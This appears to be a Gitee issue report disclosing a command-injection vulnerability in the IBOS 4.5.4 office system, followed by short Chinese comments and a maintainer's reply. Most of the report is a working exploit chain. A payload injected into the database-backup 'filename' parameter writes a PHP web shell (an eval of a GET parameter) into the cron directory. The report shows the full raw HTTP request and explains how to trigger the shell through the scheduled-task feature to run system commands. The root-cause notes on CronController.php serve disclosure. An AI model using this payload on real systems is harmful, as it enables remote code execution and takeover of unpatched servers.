os : windows;
IBOS version : IBOS 4.5.4 OPEN
use this vulnerability https://gitee.com/ibos/IBOS/issues/I18IIV
to write a file on the specified directory.
first,login in to IBOS system and enter the management background.The operation is as follows like this.
Use burpsuite to grab packets and send them to "Repeater" for modification.Insert payload in parameter filename value.
the payload is like this.This payload will generate a file named "zzzzzz" in /system/modules/recruit/cron
.
%26cd%20system%26cd%20modules%26cd%20recruit%26cd%20cron%26echo+eval($_GET["test"]);>>zzzzz%26aaa
and the packet is like this.
POST /?r=dashboard/database/backup HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/?r=dashboard/database/backup
Content-Type: application/x-www-form-urlencoded
Content-Length: 316
Connection: close
Cookie: P8Jm_saltkey=vpb6gmPE; PHPSESSID=3mcqdm2dr10tf3lb4cgpnl6ah5; P8Jm_sid=KmI412; P8Jm_autologin=1; P8Jm_lastactivity=1579248371; P8Jm_ulastactivity=480fKnWDRYWQhA5jDvpydR3bYm23jT9YOEmv%2FidCRP372M6FAptj
Upgrade-Insecure-Requests: 1
backuptype=custom&customtables%5B%5D=test_announcement&custom_enabled=1&method=shell&sizelimit=2048&extendins=0&sqlcompat=MYSQL41&sqlcharset=utf8&usehex=0&usezip=0&filename=2020-01-17_kRHRRgOk%26cd%20system%26cd%20modules%26cd%20recruit%26cd%20cron%26echo+eval($_GET["test"]);>>zzzzz%26aaa&dbSubmit=1
enter scheduled task like this,and modify it.The file name was generate in "step-1",such as "zzzzzz".
in this function,modify the "Task script" like this and submit it.
Then you can run this script like this.
and use burpsuite function "Repeater" and add the parameter "test" like this,such as "phpinfo()".
run system command is like this,such as "ipconfig".
The problematic vulnerability is the file /system/modules/dashboard/controllers/CronController.php
and the the function in question is actionIndex()
in line 16.
look at line 40 getRealCronFile()
function will form a complete file path.and the line 41 to line 47,this is the string used to filter filename that modify scheduled tasks.
getRealCronFile()
function code.
In the above code, the save path and file name of the file are guaranteed, but the suffix of the file is not guaranteed, so you can write to arbitrary files to include getshell through other vulnerabilities.
Should contain a specific type of file in a specified directory, or a specified file.
这个issue发现的厉害啊 可惜ibos已经不维护了 你是哈尔滨的?
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
@mahuan 平时没怎么用,也只是对ibos做下安全测试
感谢提交issue,因个人身体和精力原因,本人已久疏于对此开源仓库的更新,对各位使用的用户十分抱有歉意,若有意向PR和维护,可接受这个邀请。https://gitee.com/ibos/IBOS/invite_link?invite=01b415e2534ea3042efc3e1abcb4a556449e1ef86486475c8b40572f73d50c1ed2d883d557bd3e9863ce7e16acfba504
登录 后才可以发表评论